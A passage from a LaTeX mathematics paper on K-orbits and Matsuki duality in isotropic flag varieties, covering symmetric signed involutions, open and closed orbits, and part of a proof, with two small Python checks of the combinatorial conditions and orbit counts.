\item in types BD1 and C2, the restriction of $\omega$ to $V_+$ and $V_-$ is nondegenerate, i.e., $V_+^\perp=V_-$,
\item in types C1 and D3, $V_+$ and $V_-$ are Lagrangian with respect to $\omega$, i.e., $V_+^\perp=V_+$ and $V_-^\perp=V_-$.
\end{itemize}
Set $K:=\{g\in G:g\delta=\delta g\}$ and $G^0:=\{g\in G:\mbox{$g$ preserves $\phi$}\}$.
\medskip
\paragraph{\bf Combinatorial notation}
Recall that $w_0(k)=n-k+1$.
Let $(\eta,\epsilon)\in\{1,-1\}^2$.
A signed involution $(w,\varepsilon)$ is called {\em $(\eta,\epsilon)$-symmetric} if the following conditions hold
\begin{itemize}
\item[(i)] $ww_0=w_0w$ (so that the set $\{\ell:w_\ell=\ell\}$ is $w_0$-stable);
\item[(ii)] $\varepsilon_{w_0(k)}=\eta \varepsilon_k$ for all $k\in\{\ell:w_\ell=\ell\}$;
\end{itemize}
and in the case where $\eta\not=\epsilon$:
\begin{itemize}
\item[(iii)]$w_k\not=w_0(k)$ for all $k$.
\end{itemize}
Assuming $n=p+q$, let $\mathfrak{I}_n^{\eta,\epsilon}(p,q)\subset\mathfrak{I}_n(p,q)$ denote the subset of signed involutions of signature $(p,q)$ which are $(\eta,\epsilon)$-symmetric.
Specifically, $(w,\varepsilon)$ is $(1,1)$-symmetric when the signed link pattern $l(w,\varepsilon)$ is symmetric;
$(w,\varepsilon)$ is $(1,-1)$-symmetric when $l(w,\varepsilon)$ is symmetric and does not have symmetric arcs (i.e., joining $k$ and $n-k+1$);
$(w,\varepsilon)$ is $(-1,-1)$-symmetric
when $l(w,\varepsilon)$ is antisymmetric
in the sense that the mirror image of $l(w,\varepsilon)$ is a signed link pattern with the same arcs but opposite signs; $(w,\varepsilon)$ is $(-1,1)$-symmetric when $l(w,\varepsilon)$ is antisymmetric and does not have symmetric arcs. For instance:
\begin{eqnarray*}
& \begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16} \courbe{0}{96}{0}{40}{48}{56}{26}
\courbe{64}{112}{0}{86}{88}{90}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(77,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(110,-3){$\bullet$}
\end{picture}
\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{1,1}_9(5,4),$}
\end{array}
\qquad
\begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16} \courbe{0}{112}{0}{48}{56}{64}{28}
\courbe{80}{128}{0}{102}{104}{106}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(93,-9){$-$} \put(110,-3){$\bullet$} \put(126,-3){$\bullet$}
\end{picture}
\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{-1,-1}_{10}(5,5)$,}
\end{array} \\
& \begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16}
\courbe{80}{128}{0}{102}{104}{106}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(-3,-9){$-$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$+$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(93,-9){$+$} \put(110,-3){$\bullet$} \put(109,-9){$-$} \put(126,-3){$\bullet$}
\end{picture}\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{1,-1}_{10}(6,4),$}
\end{array}
\qquad
\begin{array}[t]{c}
\begin{picture}(140,30)(-20,-5)
\courbe{-16}{32}{0}{8}{10}{12}{16}
\courbe{80}{128}{0}{102}{104}{106}{16} \put(-18,-3){$\bullet$}
\put(-2,-3){$\bullet$} \put(-3,-9){$-$} \put(14,-3){$\bullet$} \put(13,-9){$+$}
\put(30,-3){$\bullet$} \put(46,-3){$\bullet$} \put(45,-9){$-$}
\put(62,-3){$\bullet$} \put(61,-9){$+$} \put(78,-3){$\bullet$}
\put(94,-3){$\bullet$} \put(93,-9){$-$} \put(110,-3){$\bullet$} \put(109,-9){$+$} \put(126,-3){$\bullet$}
\end{picture}
\\[1mm]
\mbox{$(w,\varepsilon)\in\mathfrak{I}^{-1,1}_{10}(5,5)$.}
\end{array}
\end{eqnarray*}
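Conditions (i)--(iii) are purely combinatorial and can be tested mechanically. The sketch below (ours; \texttt{is\_symmetric} is a name we introduce) encodes them verbatim, with $w$ given as a dict on $\{1,\ldots,n\}$ and the signs as a dict on the fixed points.

```python
def is_symmetric(w, eps, n, eta, epsilon):
    """Test whether the signed involution (w, eps) is (eta, epsilon)-symmetric,
    i.e., satisfies conditions (i)-(iii) above.  Here w0(k) = n - k + 1."""
    w0 = lambda k: n - k + 1
    # (i) w commutes with w0
    if any(w[w0(k)] != w0(w[k]) for k in range(1, n + 1)):
        return False
    # (ii) signs of fixed points satisfy eps[w0(k)] = eta * eps[k]
    #      (condition (i) guarantees the fixed-point set is w0-stable)
    if any(eps[w0(k)] != eta * eps[k] for k in eps):
        return False
    # (iii) no symmetric arcs when eta != epsilon
    #      (the literal condition w_k != w0(k) for all k)
    if eta != epsilon and any(w[k] == w0(k) for k in range(1, n + 1)):
        return False
    return True

# The first example above: w = (1;4)(2;8)(6;9), signs (+, -, +) at 3, 5, 7.
w = {1: 4, 4: 1, 2: 8, 8: 2, 6: 9, 9: 6, 3: 3, 5: 5, 7: 7}
eps = {3: +1, 5: -1, 7: +1}
```

On this input \texttt{is\_symmetric(w, eps, 9, 1, 1)} returns \texttt{True}, consistent with $(w,\varepsilon)\in\mathfrak{I}^{1,1}_9(5,4)$.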
\begin{proposition}
\label{P3}
Let $(p,q)=(\dim V_+,\dim V_-)$ (so that $p=q=\frac{n}{2}$ in types C1 and D3).
Set
$(\eta,\epsilon)=(1,1)$ in type BD1,
$(\eta,\epsilon)=(1,-1)$ in type C2,
$(\eta,\epsilon)=(-1,-1)$ in type C1, and
$(\eta,\epsilon)=(-1,1)$ in type D3.
\begin{itemize}
\item[(a)] For every $(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$,
considering bases $\underline{v}=(v_1,\ldots,v_n)$ of $V$ such that
\begin{equation}
\label{3.3.18}
\omega(v_k,v_\ell)=\left\{\begin{array}{ll} 0 & \mbox{if $\ell\not=n-k+1$}
\\
1 & \mbox{if $\ell=n-k+1$ and $w_k,w_\ell\in[k,\,\ell]$ ($k\leq\ell$)} \\
\epsilon & \mbox{if $\ell=n-k+1$ and $w_k,w_\ell\in[\ell,\,k]$ ($\ell\leq k$)} \\
\eta & \mbox{if $\ell=n-k+1$ and $k,\ell\in]w_k,\,w_\ell[$} \\
\eta\epsilon & \mbox{if $\ell=n-k+1$ and $k,\ell\in]w_\ell,\,w_k[$,} \\
\end{array}\right.
\end{equation}
we have
\begin{eqnarray*}
& & \mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}:=\mathcal{O}_{(w,\varepsilon)}\cap X_\omega=\{\mathcal{F}(\underline{v}):\underline{v}\mbox{ is $(w,\varepsilon)$-conjugate and satisfies (\ref{3.3.18})}\}\not=\emptyset, \\
& & \mathfrak{O}^{\eta,\epsilon}_{(w,\varepsilon)}:=\mathfrak{O}_{(w,\varepsilon)}\cap X_\omega=\{\mathcal{F}(\underline{v}):\underline{v}\mbox{ is $(w,\varepsilon)$-dual and satisfies (\ref{3.3.18})}\}\not=\emptyset, \\
& & \mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\cap\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}
\\
&&\phantom{aaa}=\{\mathcal{F}(\underline{v}):\underline{v}\mbox{ is $(w,\varepsilon)$-conjugate and $(w,\varepsilon)$-dual and satisfies (\ref{3.3.18})}\}\not=\emptyset.
\end{eqnarray*}
\item[(b)] The subsets $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ ($(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$) are exactly the $K$-orbits of $X_\omega$.
The subsets $\mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ ($(w,\varepsilon)\in\mathfrak{I}_n^{\eta,\epsilon}(p,q)$) are exactly the $G^0$-orbits of $X_\omega$.
\item[(c)] The map $\mathcal{O}_{(w,\varepsilon)}^{\eta,\epsilon}\mapsto \mathfrak{O}_{(w,\varepsilon)}^{\eta,\epsilon}$ is Matsuki duality.
\end{itemize}
\end{proposition}
\subsection{Remarks}
Set $X_0:=X$ in type A and $X_0:=X_\omega$ in types B, C, D.
\begin{remark}
\label{R3.4.1}
The characterization of the $K$-orbits in Propositions \ref{P1}--\ref{P3} can be stated in the following unified way. For $\mathcal{F}\in X$ we write
$\sigma(\mathcal{F})=\mathcal{F}^\perp$ in types A1--A2 and
$\sigma(\mathcal{F})=\delta(\mathcal{F})$ in types A3, BD1, C1--C2, D3. Let $P\subset
G$ be a parabolic subgroup containing $K$ and which is minimal for
this property. Two flags $\mathcal{F}_1,\mathcal{F}_2\in X_0$ belong
to the same $K$-orbit if and only if
$(\sigma(\mathcal{F}_1),\mathcal{F}_1)$ and
$(\sigma(\mathcal{F}_2),\mathcal{F}_2)$ belong to the same orbit of $P$ for the diagonal action of $P$ on $X_0\times X_0$.
\end{remark}
\begin{remark}[Open $K$-orbits]
\label{R-open}
With the notation of Remark \ref{R3.4.1} the map $\sigma_0:X_0\to X\times X$, $\mathcal{F}\mapsto(\sigma(\mathcal{F}),\mathcal{F})$ is a closed embedding.
In types A and C the flag variety $X_0$ is irreducible.
In particular there is a unique $G$-orbit $\mathbb{O}_w\subset X\times X$
such that $\mathbb{O}_w\cap \sigma_0(X_0)$ is open in $\sigma_0(X_0)$;
it corresponds to an element $w\in\mathfrak{S}_n$ maximal for the Bruhat order such that $\mathbb{O}_w$ intersects $\sigma_0(X_0)$.
In each case one finds a unique $K$-orbit $\mathcal{O}\subset X_0$ such that $\sigma_0(\mathcal{O})\subset\mathbb{O}_w$; it is therefore the (unique) open $K$-orbit of $X_0$.
This yields the following list of open $K$-orbits in types A1--A3, C1--C2:
\begin{itemize}
\item[\rm A1:] $\mathcal{O}_\mathrm{id}$;
\item[\rm A2:] $\mathcal{O}_{v_0}$ where $v_0=(1;2)(3;4)\cdots(n-1;n)$;
\item[\rm A3:] $\mathcal{O}_{(w_0^{(t)},\varepsilon)}$ where
$t=\min\{p,q\}$, $\varepsilon\equiv\mathrm{sign}(p-q)$,
and $w^{(t)}_0=\prod\limits_{k=1}^t(k;n-k+1)$;
\item[\rm C1:] $\mathcal{O}^{-1,-1}_{(w_0,\emptyset)}$;
\item[\rm C2:] $\mathcal{O}^{1,-1}_{(\hat{w}_0^{(t)},\varepsilon)}$
where $t=\min\{p,q\}$, $\varepsilon\equiv\mathrm{sign}(p-q)$, and $\hat{w}_0^{(t)}=v_0^{(t)}w_0^{(t)}v_0^{(t)}$,
where $v_0^{(t)}=(1;2)(3;4)\cdots(t-1;t)$.
\end{itemize}
If $n=\dim V$ is even and the form $\omega$ is orthogonal, then the variety $X_\omega$ has two connected components.
In fact, for every isotropic flag $\mathcal{F}=(F_k)_{k=0}^n\in X_\omega$ there is a unique $\tilde{\mathcal{F}}=(\tilde{F}_k)_{k=0}^n\in X_\omega$
such that $F_k=\tilde{F}_k$ for all $k\not=m:=\frac{n}{2}$ and $\tilde{F}_m\not=F_m$.
Then the map $\tilde{I}:\mathcal{F}\mapsto\tilde{\mathcal{F}}$ is an automorphism
of $X_\omega$ which maps one component of $X_\omega$ onto the other.
If $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ for a basis $\underline{v}=(v_1,\ldots,v_n)$ such that
\[\omega(v_k,v_\ell)\not=0\Leftrightarrow \ell=n-k+1\]
then
$\tilde{I}(\mathcal{F}(\underline{v}))=\mathcal{F}(\underline{\tilde{v}})$
where $\underline{\tilde{v}}$ is the basis obtained from $\underline{v}$ by switching the two middle vectors $v_m,v_{m+1}$.
If $\underline{v}$ is $(w,\varepsilon)$-conjugate then $\underline{\tilde{v}}$ is $\tilde{i}(w,\varepsilon)$-conjugate where
$\tilde{i}(w,\varepsilon):=\big((m;m+1)w(m;m+1),\varepsilon\circ(m;m+1)\big)$.
Hence $\tilde{I}$ maps the $K$-orbit $\mathcal{O}^{\eta,\epsilon}_{(w,\varepsilon)}$
onto $\mathcal{O}^{\eta,\epsilon}_{\tilde{i}(w,\varepsilon)}$.
In type D3,
$X_\omega$ has exactly two open $K$-orbits.
More precisely $w=\hat{w}_0:=w_0v_0$
is maximal for the Bruhat order such that $\mathbb{O}_w\cap\sigma_0(X_0)$ is nonempty,
hence $\sigma_0^{-1}(\mathbb{O}_{\hat{w}_0})$ is open.
The permutation $\hat{w}_0$ has no fixed point if $m:=\frac{n}{2}$ is even; if $m$ is odd, $\hat{w}_0$ fixes $m$ and $m+1$.
In the former case
$\sigma_0^{-1}(\mathbb{O}_{\hat{w}_0})=\mathcal{O}^{-1,1}_{(\hat{w}_0,\emptyset)}$
is a single $K$-orbit, and
$\tilde{I}(\mathcal{O}^{-1,1}_{(\hat{w}_0,\emptyset)})=\mathcal{O}^{-1,1}_{\tilde{i}(\hat{w}_0,\emptyset)}$
is a second open $K$-orbit.
In the latter case
$\sigma_0^{-1}(\mathbb{O}_{\hat{w}_0^{(m-1)}})=\mathcal{O}^{-1,1}_{(\hat{w}_0,\varepsilon)}\cup\mathcal{O}^{-1,1}_{(\hat{w}_0,\tilde\varepsilon)}$, where $(\varepsilon_m,\varepsilon_{m+1})=(\tilde\varepsilon_{m+1},\tilde\varepsilon_m)=(+1,-1)$, is the union of two distinct open $K$-orbits
which are images of each other under $\tilde{I}$.
In type BD1 the variety $X_\omega$ may be reducible
but $w=w^{(t)}_0$, for $t:=\min\{p,q\}$, is the unique maximal element of $\mathfrak{S}_n$
such that $\mathbb{O}_w\cap\sigma_0(X_0)$ is nonempty.
Then $\sigma_0^{-1}(\mathbb{O}_w)$
consists of a single $\tilde{I}$-stable open $K$-orbit, namely
$\mathcal{O}^{1,1}_{(w^{(t)}_0,\varepsilon)}$ for $\varepsilon\equiv\mathrm{sign}(p-q)$.
The flag variety $X_\omega$ therefore has a unique open $K$-orbit (which is not connected whenever $n$ is even).
\end{remark}
\begin{remark}[Closed $K$-orbits]
\label{R-closed}
We use the notation of Remarks \ref{R3.4.1}--\ref{R-open}.
As seen from Propositions \ref{P1}--\ref{P3}, in each case
one finds a unique $w_{\mathrm{min}}\in\mathfrak{S}_n$ such that $\mathbb{O}_{w_{\mathrm{min}}}\cap\sigma_0(X_0)$ is closed;
actually $w_{\mathrm{min}}=\mathrm{id}$ except in type BD1 for $p,q$ odd:
in that case $w_{\mathrm{min}}=(\frac{n}{2};\frac{n}{2}+1)$.
For every $K$-orbit $\mathcal{O}\subset X_0$ the following equivalence holds:
\[
\mbox{$\mathcal{O}$ is closed}\quad \Leftrightarrow\quad \sigma_0(\mathcal{O})\subset\mathbb{O}_{w_{\mathrm{min}}}
\]
(see \cite{Brion,Richardson-Springer}). In view of this equivalence, we deduce the following list of closed $K$-orbits of $X_0$ for the different types.
In types A1 and A2, $\mathcal{O}_{w_0}$ is the unique closed $K$-orbit.
In type A3 the closed $K$-orbits are exactly the orbits
$\mathcal{O}_{(\mathrm{id},\varepsilon)}$ for all pairs of the form $(\mathrm{id},\varepsilon)\in\mathfrak{I}_n(p,q)$;
there are $\binom{n}{p}$ such orbits.
In types B, C, D, the closed $K$-orbits are the orbits
$\mathcal{O}^{\eta,\epsilon}_{(\mathrm{id},\varepsilon)}$ for all pairs of the form $(\mathrm{id},\varepsilon)\in\mathfrak{I}^{\eta,\epsilon}_n(p,q)$,
except in type BD1 in the case where $n=:2m$ is even and $p,q$ are odd;
in that case the closed $K$-orbits
are the orbits $\mathcal{O}^{1,1}_{((m;m+1),\varepsilon)}$
for all pairs of the form $((m;m+1),\varepsilon)\in\mathfrak{I}^{1,1}_n(p,q)$.
There are $\binom{\lfloor\frac{p}{2}\rfloor+\lfloor\frac{q}{2}\rfloor}{\lfloor\frac{p}{2}\rfloor}$ closed orbits in types BD1 and C2, and there are $2^{\frac{n}{2}}$ closed orbits in types C1 and D3.
\end{remark}
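In small rank the counting formulas above can be confirmed by brute force. The following Python sketch (ours, not part of the paper) counts, for type BD1 with $w=\mathrm{id}$, the symmetric sign vectors of signature $(p,q)$, and for types C1 and D3 the antisymmetric ones; the BD1 case with $p,q$ both odd (where $w_{\mathrm{min}}=(m;m+1)$) is deliberately left out of the sketch.

```python
from itertools import product
from math import comb

def count_BD1(n, p):
    """Count (1,1)-symmetric pairs (id, eps) of signature (p, n - p):
    sign vectors eps in {+1,-1}^n with eps_{n-k+1} = eps_k and p plus signs.
    (Empty when p and n - p are both odd; the closed orbits then come from
    w = (m; m+1) instead, which this sketch does not handle.)"""
    return sum(
        1 for eps in product([1, -1], repeat=n)
        if all(eps[n - 1 - k] == eps[k] for k in range(n))
        and eps.count(1) == p
    )

def count_C1_D3(n):
    """Count antisymmetric sign vectors: eps_{n-k+1} = -eps_k (n even)."""
    return sum(
        1 for eps in product([1, -1], repeat=n)
        if all(eps[n - 1 - k] == -eps[k] for k in range(n))
    )
```

For instance \texttt{count\_BD1(8, 4)} returns $\binom{2+2}{2}=6$ and \texttt{count\_C1\_D3(4)} returns $2^{2}=4$, as predicted by the formulas above.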
\begin{remark} Propositions
\ref{P1}--\ref{P3} show in particular that the {\em special elements
of $X_0$}, in the sense of Matsuki \cite{Matsuki, Matsuki3}, are
precisely the flags $\mathcal{F}\in X_0$ of the form
$\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ where $(v_1,\ldots,v_n)$
is a basis of $V$ which is both dual and conjugate, with
respect to some involution $w\in\mathfrak{I}_n^\epsilon$ in types A1
and A2, and to some signed involution
$(w,\varepsilon)\in\mathfrak{I}_n(p,q)$ in types A3, B--D. Indeed, in view of \cite{Matsuki, Matsuki3} the set
$\mathcal{S}\subset X_0$ of special elements equals
\[\bigcup_{\mathcal{O}\in X_0/K}\mathcal{O}\cap\Xi(\mathcal{O})\]
where the map $X_0/K\to X_0/G^0$, $\mathcal{O}\mapsto\Xi(\mathcal{O})$
stands for Matsuki duality.
\end{remark}
\subsection{Proofs}
\label{S3.5}
\begin{proof}[Proof of Proposition \ref{P1}\,{\rm (a)}]
We write $w=(a_1;b_1)\cdots(a_m;b_m)$ with $a_1<\ldots<a_m$ and
$a_k<b_k$ for all $k$; let $c_1<\ldots<c_{n-2m}$ be the elements of
the set $\{k:w_k=k\}$.
In type A2 we have $n=2m$, and $(e_1,\ldots,e_n)$ is both a
$(1;2)(3;4)\cdots(n-1;n)$-dual basis and a
$(1;2)(3;4)\cdots(n-1;n)$-conjugate basis; then the basis
$(e'_1,\ldots,e'_n)$ given by
\[e'_{a_\ell}=e_{2\ell-1}\quad\mbox{and}\quad e'_{b_\ell}=e_{2\ell}\quad\mbox{for all $\ell\in\{1,\ldots,m\}$}\]
is simultaneously $w$-dual and $w$-conjugate.
In type A1,
up to replacing $e_\ell$ and $e_{\ell^*}$ by $\frac{e_\ell+e_{\ell^*}}{\sqrt{2}}$ and $\frac{e_\ell-e_{\ell^*}}{i\sqrt{2}}$ whenever $\ell<\ell^*$,
we may assume that
the basis $(e_1,\ldots,e_n)$ is both $\mathrm{id}$-dual
and $\mathrm{id}$-conjugate. For every $\ell\in\{1,\ldots,m\}$ and
$k\in\{1,\ldots,n-2m\}$, we set
\[e'_{a_\ell}=\frac{e_{2\ell-1}+ie_{2\ell}}{\sqrt{2}},\quad e'_{b_\ell}=\frac{e_{2\ell-1}-ie_{2\ell}}{\sqrt{2}},\quad\mbox{and}\quad e'_{c_k}=e_{2m+k}.\]
Then $(e'_1,\ldots,e'_n)$ is simultaneously a $w$-dual and a
$w$-conjugate basis.
In both cases we conclude that
\begin{equation}
\label{3.1.4}
\emptyset\not=\{\mathcal{F}(v_1,\ldots,v_n):\mbox{$(v_1,\ldots,v_n)$ is $w$-dual and $w$-conjugate}\}\subset\mathcal{O}_w\cap\mathfrak{O}_w.
\end{equation}
Let us show the reverse inclusion. Assume
$\mathcal{F}=(F_0,\ldots,F_n)\in\mathcal{O}_w\cap\mathfrak{O}_w$.
Let $(v_1,\ldots,v_n)$ be a $w$-dual basis such that $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$.
Since $\mathcal{F}\in\mathfrak{O}_w$ we have
\begin{equation}
\label{1-new}
w_k=\min\{\ell=1,\ldots,n:\gamma(F_k)\cap F_\ell\not=\gamma(F_{k-1})\cap F_\ell\}.
\end{equation}
For all $\ell\in\{0,\ldots,n\}$ we will now construct a $w$-dual basis
$(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ of $V$ such that
\begin{eqnarray}
\label{2-new}
& F_k=\langle v_1^{(\ell)},\ldots,v_k^{(\ell)}\rangle_\mathbb{C}
\quad\mbox{
for all $k\in\{1,\ldots,n\}$}
\end{eqnarray}
and
\begin{eqnarray}
\label{3-new}
&
\gamma(v_k^{(\ell)})=\left\{\begin{array}{ll}
\epsilon v_{w_k}^{(\ell)} & \mbox{if $w_k\geq k$,} \\
v_{w_k}^{(\ell)} & \mbox{if $w_k<k$}
\end{array}\right.
\quad\mbox{
for all $k\in\{1,\ldots,\ell\}$.}
\end{eqnarray}
This will then imply
$\mathcal{F}=\mathcal{F}(v_1^{(n)},\ldots,v_n^{(n)})$ for a
basis $(v_1^{(n)},\ldots,v_n^{(n)})$ both $w$-dual and $w$-conjugate,
i.e., will complete the proof of (a).
Our construction is done by induction starting with $(v_1^{(0)},\ldots,v_n^{(0)})=(v_1,\ldots,v_n)$.
Let $\ell\in\{1,\ldots,n\}$, and assume that $(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is constructed.
We distinguish three cases.
\smallskip
\noindent
{\it Case 1: $w_\ell<\ell$.}
The inequality $w_\ell<\ell=w(w_\ell)$ implies $\gamma(v_{w_\ell}^{(\ell-1)})=\epsilon v_{\ell}^{(\ell-1)}$, whence
$\gamma(v_{\ell}^{(\ell-1)})=v_{w_\ell}^{(\ell-1)}$ as $\gamma^2=\epsilon\mathrm{id}$.
Therefore the basis $(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ fulfills conditions (\ref{2-new}) and (\ref{3-new}).
\smallskip
\noindent
{\it Case 2: $w_\ell=\ell$.}
This case occurs only in type A1.
On the one hand, (\ref{1-new}) yields
\[\gamma(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},\ldots,v_\ell^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}.\]
On the other hand, since the basis $(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is $w$-dual,
we have
\[v_\ell^{(\ell-1)}\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\perp\,.\]
Hence, as $\gamma$ preserves orthogonality with respect to $\omega$,
\begin{eqnarray*}
\gamma(v_\ell^{(\ell-1)}) & \in & \langle \gamma(v_1^{(\ell-1)}),\ldots,\gamma(v_{\ell-1}^{(\ell-1)}),\gamma(v_{w_1}^{(\ell-1)}),\ldots,\gamma(v_{w_{\ell-1}}^{(\ell-1)})\rangle_\mathbb{C}^\perp \\
& & =\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\perp.
\end{eqnarray*}
Altogether this yields a nonzero complex number $\lambda$ such that $\gamma(v_\ell^{(\ell-1)})=\lambda v_\ell^{(\ell-1)}$.
Since $\gamma$ is an involution, we have $\lambda\in\{+1,-1\}$.
In addition we know that
\[\lambda=\omega(\gamma(v_\ell^{(\ell-1)}),v_\ell^{(\ell-1)})={}^t\overline{v_\ell^{(\ell-1)}}\cdot v_\ell^{(\ell-1)}\in\mathbb{R}^+.\]
Whence $\gamma(v_\ell^{(\ell-1)})=v_\ell^{(\ell-1)}$, and we can put
$(v_1^{(\ell)},\ldots,v_n^{(\ell)}):=(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$.
\smallskip
\noindent
{\it Case 3: $w_\ell>\ell$.}
By (\ref{1-new}) we have
\[\gamma(v_\ell^{(\ell-1)})\in
\langle v_k^{(\ell-1)}:1\leq k\leq w_\ell\rangle_\mathbb{C}+\langle v_{w_k}^{(\ell-1)}:1\leq k\leq \ell-1\rangle_\mathbb{C}.
\]
On the other hand, arguing as in Case 2 we see that
\[\gamma(v_\ell^{(\ell-1)})\in\langle v_1^{(\ell-1)},\ldots,v_{\ell-1}^{(\ell-1)},v_{w_1}^{(\ell-1)},\ldots,v_{w_{\ell-1}}^{(\ell-1)}\rangle_\mathbb{C}^\perp.\]
Hence we can write
\begin{equation}
\label{4-new}
\gamma(v_\ell^{(\ell-1)})=\sum_{k\in I}\lambda_kv_k^{(\ell-1)}
\quad\mbox{with $\lambda_k\in\mathbb{C}$ for all $k$,}
\end{equation}
where $I:=\{k:\ell\leq k\leq w_\ell\mbox{ and }\ell\leq w_k\}\subset\hat{I}:=\{k:\ell\leq k\mbox{ and }\ell\leq w_k\}$.
Using (\ref{4-new}), the fact that the basis $(v_1^{(\ell-1)},\ldots,v_n^{(\ell-1)})$ is $w$-dual, and the definition of $\omega$ and $\gamma$, we see that
\begin{equation}
\label{5-new}
\lambda_{w_\ell}=\omega(v_\ell^{(\ell-1)},\gamma(v_\ell^{(\ell-1)}))=\epsilon\cdot{}^tv_\ell^{(\ell-1)}\overline{v_\ell^{(\ell-1)}}=\epsilon\alpha
\end{equation}
with $\alpha\in\mathbb{R}$, $\alpha>0$.
Set
\begin{eqnarray*}
&& v_\ell^{(\ell)}:=\frac{1}{\sqrt{\alpha}}v_\ell^{(\ell-1)},\quad
v_{w_\ell}^{(\ell)}:=\frac{\epsilon}{\sqrt{\alpha}}\gamma(v_\ell^{(\ell-1)}),\\
&& v_k^{(\ell)}:=v_k^{(\ell-1)}-\frac{\omega(v_k^{(\ell-1)},\gamma(v_\ell^{(\ell-1)}))}{\lambda_{w_\ell}}v_\ell^{(\ell-1)}\ \mbox{ for all $k\in \hat{I}\setminus\{\ell,w_\ell\}$}, \\
&& v_k^{(\ell)}:=v_k^{(\ell-1)}\ \mbox{ for all $k\in\{1,\ldots,n\}\setminus \hat{I}$.}
\end{eqnarray*}
Using (\ref{4-new}) and (\ref{5-new}) it is easy to check that $(v_1^{(\ell)},\ldots,v_n^{(\ell)})$ is a $w$-dual basis which satisfies (\ref{2-new}) and (\ref{3-new}).
This completes Case 3.
\end{proof}
\begin{proof}[Proof of Proposition \ref{P1}\,{\rm (b)}--{\rm (d)}]
Let $\mathcal{F}\in\mathcal{O}_w$, so
$\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)$ for some $w$-dual basis
$(v_1,\ldots,v_n)$ of $V$. From the definition of
$w$-dual basis we see that
\begin{eqnarray*}
\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\perp & = & \langle v_j:w_j\notin\{1,\ldots,n-k\}\rangle_\mathbb{C} \\
& = & \langle v_j:w_j\in\{n-k+1,\ldots,n\}\rangle_\mathbb{C} \\
& = & \langle v_j:(w_0w)_j\in\{1,\ldots,k\}\rangle_\mathbb{C}\,.
\end{eqnarray*}
Therefore
\[\dim\langle v_1,\ldots,v_{n-k}\rangle_\mathbb{C}^\perp\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=\big|\big\{j\in\{1,\ldots,\ell\}:(w_0w)_j\in\{1,\ldots,k\}\big\}\big|\]
for all $k,\ell\in\{1,\ldots,n\}$, which yields the equality
$w(\mathcal{F}^\perp,\mathcal{F})=w_0w$ and hence the inclusion
\begin{equation}
\label{1}
\mathcal{O}_w\subset\{\mathcal{F}\in
X:(\mathcal{F}^\perp,\mathcal{F})\in\mathbb{O}_{w_0w}\}.
\end{equation}
Let $\mathcal{F}=\mathcal{F}(v_1,\ldots,v_n)\in\mathfrak{O}_w$ for a
$w$-conjugate basis $(v_1,\ldots,v_n)$ of $V$. From the
definition of $w$-conjugate basis we get
\[\gamma(\langle v_1,\ldots,v_k\rangle_\mathbb{C})=\langle v_{w_j}:j\in\{1,\ldots,k\}\rangle_\mathbb{C}\,.\]
Therefore
\[\dim\gamma(\langle v_1,\ldots,v_k\rangle_\mathbb{C})\cap\langle v_1,\ldots,v_\ell\rangle_\mathbb{C}=\big|\big\{j\in\{1,\ldots,\ell\}:w^{-1}_j\in\{1,\ldots,k\}\big\}\big|\]
for all $k,\ell\in\{1,\ldots,n\}$, whence
$w(\gamma(\mathcal{F}),\mathcal{F})=w^{-1}=w$ (since $w$ is an
involution). This implies the inclusion
\begin{equation}
\label{2} \mathfrak{O}_w\subset\{\mathcal{F}\in
X:(\gamma(\mathcal{F}),\mathcal{F})\in\mathbb{O}_{w}\}.
